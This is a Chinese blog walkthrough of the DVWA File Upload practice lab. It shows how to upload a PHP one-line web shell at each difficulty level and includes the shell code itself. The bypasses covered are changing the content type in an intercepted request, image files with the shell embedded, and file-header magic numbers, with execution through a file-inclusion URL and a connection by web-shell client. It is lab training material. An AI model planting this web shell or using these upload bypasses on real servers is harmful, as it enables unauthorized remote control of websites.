DVWA-文件上传

File Upload 文件上传

low

  1. 先分析一下源代码

    在这里插入图片描述

    其中有一个move_upload_file的php函数,看一下官网解释

    在这里插入图片描述

    可以发现源代码中没有任何过滤

  2. 因为是php代码,所以直接上传php的一句话木马

    <?php @eval($_POST['333']);?>
    

    在这里插入图片描述

  3. 按照保存路径查看,页面空白说明上传成功

    在这里插入图片描述

  4. 启动蚁剑,添加数据,测试连接

    在这里插入图片描述

  5. 连接成功

    vdx

medium

  1. 先分析一下源代码

    在这里插入图片描述

  2. 此时的想法是抓包,更改文件类型;先上传一句话木马

    在这里插入图片描述

  3. bp抓到包,修改下文件名试试

    在这里插入图片描述

    还是失败

  4. 更改文件类型

    在这里插入图片描述

  5. 蚁剑连接,步骤同low等级

high

  1. 分析一下源代码

    在这里插入图片描述

    strtolower:将后缀名转换为小写,并且需要是jpg、jpef、png三种
    upload_size:上传文件大小要小于100000
    getimagesize:取得图像大小,检查文件的头部(二进制)

  2. 此时有两种方法绕过,一是图片马:vim打开图片,在最后加上php一句话木马

    在这里插入图片描述

  3. dvwa直接上传图片

    在这里插入图片描述

  4. 访问上传路径,通过page访问图片文件并执行

    http://192.168.117.164/dvwa/vulnerabilities/fi/?page=file:///C:\phpStudy_2016\WWW\dvwa\hackable\uploads/1.png
    

    在这里插入图片描述

  5. 蚁剑连接,连接失败,因为蚁剑在连接时并没有携带cookie,正因为缺少cookie值才无法连接成功

    在这里插入图片描述

  6. 先将地址添加进去,选择浏览网站

    在这里插入图片描述

  7. 在地址栏访问DVWA首页,进行登录

    http://192.168.117.164/dvwa
    
  8. 登录成功后将难度设置为high级别

    在这里插入图片描述

  9. 保存cookie信息

    在这里插入图片描述

  10. 此时可以进行文件管理

    在这里插入图片描述

  11. 第二种方法,上传php一句话木马,在头部加入文件幻数

    在这里插入图片描述

    文件幻数是一种固定头部或固定尾部

    在这里插入图片描述

  12. 文件上传成功

impossible

分析源代码

在这里插入图片描述

相比于high难度,添加了imagecreatefromjpeg函数,相当于新建了一个新图像,进行了二次渲染

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值